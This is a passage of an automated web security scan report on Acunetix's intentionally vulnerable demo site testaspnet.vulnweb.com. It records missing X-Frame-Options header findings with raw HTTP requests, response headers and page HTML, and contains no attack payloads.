href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
